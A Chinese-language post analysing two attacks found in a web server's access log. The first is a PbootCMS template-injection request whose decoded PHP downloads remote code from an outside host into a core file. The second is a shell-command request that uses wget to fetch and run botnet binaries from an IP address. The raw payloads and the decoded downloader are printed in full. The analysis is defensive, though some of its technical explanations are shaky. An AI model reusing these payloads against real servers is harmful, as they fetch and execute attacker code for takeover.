查看后台日志发现一段恶意攻击---》134.122.184.11 - - [07/Aug/2024:08:21:09 +0800] ＂GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22temp.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCcuL2NvcmUvYmFzaWMvZnVuLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kLnNvZ291YWQudmlwL3R4dC9vdGUudHh0JykpOwplY2hvICd0ZW1wMTExODg4JzsKdW5saW5rKF9fRklMRV9fKTs=\x22)))}{/pboot:if}/../../?p=14 HTTP/1.1＂ 301 162 ＂http://n666888.com＂ ＂Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36＂

需要注意的是，请求路径中的一些代码部分看起来像是恶意或可疑的操作，可能存在安全风险。例如，其中的“file_put_contents”和“base64_decode”等函数的使用方式不太正常。

请求行

• 方法: GET

• URL: /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22temp.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCcuL2NvcmUvYmFzaWMvZnVuLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kLnNvZ291YWQudmlwL3R4dD9vdGUudHh0JykpOwplY2hvICd0ZW1wMTExODg4JzsKdW5saW5rKF9fRklMRV9fKTs=\x22)))}{/pboot:if}/../../?p=14

• 这部分URL经过精心构造，尝试绕过安全过滤和检查。它使用了{pboot:if(...)}{/pboot:if}这样的结构，可能是在尝试利用某个CMS（如PbootCMS）的模板注入漏洞。

• \x22是十六进制表示的引号（"），用于绕过某些检测机制。

• file_put_contents和base64_decode函数被用于在服务器上写入文件（temp.php），这个文件的内容是经过Base64编码的PHP代码。

• 解码后的PHP代码大致如下：

<?php  
file_put_contents('./core/basic/fun.php', file_get_contents('http://d.sogouad.vip/txt/ote.txt'));  
echo 'temp11888';  
unlink(__FILE__);

• 
  

• 这段代码尝试从远程URL（http://d.sogouad.vip/txt/ote.txt）下载内容并保存到服务器上的./core/basic/fun.php文件，然后删除自身（unlink(__FILE__);）。

• HTTP版本: HTTP/1.1

状态行

• 状态码: 301

• 这通常表示请求的资源已永久移动到新位置，但在这种情况下，它可能是服务器对非法请求的默认响应，或者是服务器配置导致的重定向。

• 响应大小: 162 字节

• 引用页: http://n666888.com

用户代理

• 用户代理字符串: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

• 这是一个模拟Chrome浏览器的用户代理字符串，用于伪装正常用户的浏览器访问。

第二个攻击-----》185.224.128.83 - - [07/Aug/2024:08:27:24 +0800] ＂GET /shell?cd+/tmp;rm+earm+earm5+earm7;nohup+wget+http:/\x5C/154.216.20.232/earm7;chmod+777+earm7;./earm7+jaws;nohup+wget+http:/\x5C/154.216.20.232/earm5;chmod+777+earm5;./earm5+jaws;nohup+wget+http:/\x5C/154.216.20.232/earm;chmod+777+earm;./earm+jaws HTTP/1.1＂ 301 162 ＂-＂ ＂KrebsOnSecurity＂

这条日志记录了一个尝试通过HTTP GET请求在服务器上执行恶意命令的尝试。然而，需要注意的是，HTTP GET请求本身并不支持在服务器上执行命令；这里的尝试似乎是对Web服务器的一个误解或滥用。不过，从URL的结构和内容来看，攻击者显然在尝试利用某个Web应用程序的漏洞来执行一系列恶意操作。

以下是对URL中尝试执行的操作的解析：

1. 尝试删除文件：cd+/tmp;rm+earm+earm5+earm7

• 这部分尝试切换到/tmp目录（但cd命令后应有空格分隔，这里可能是格式错误或尝试绕过检测），然后删除名为earm、earm5、earm7的文件。但由于+通常不被shell用作命令分隔符（而是空格或;），且URL编码可能不正确（\x5C是反斜杠\的十六进制表示，但在URL中应直接写为/），因此这部分可能不会按预期执行。

2. 下载并执行恶意文件：

• nohup+wget+http:/\x5C/154.216.20.232/earm7;chmod+777+earm7;./earm7+jaws

• 这部分尝试使用wget命令从http://154.216.20.232/（注意URL中的\x5C应该是/的误用）下载名为earm7的文件，然后将其权限更改为777（即允许所有用户读写执行），最后尝试执行该文件并传递参数jaws。

• 类似的操作还尝试下载并执行earm5和earm文件。

3. 状态码和响应大小：

• 状态码301表示请求的资源已永久移动到新位置，这通常不是由执行恶意命令导致的，而更可能是服务器配置或Web应用程序的默认响应。

• 响应大小162字节可能表示服务器返回的响应体的大小，而不是实际执行的命令的结果。

4. 引用页和用户代理：

• 引用页为"-"，表示没有提供引用页信息。

• 用户代理为KrebsOnSecurity，这很可能是一个伪造的用户代理字符串，用于伪装身份或绕过某些检测机制。实际上，KrebsOnSecurity是一个知名的网络安全博客，其名称被滥用在这里。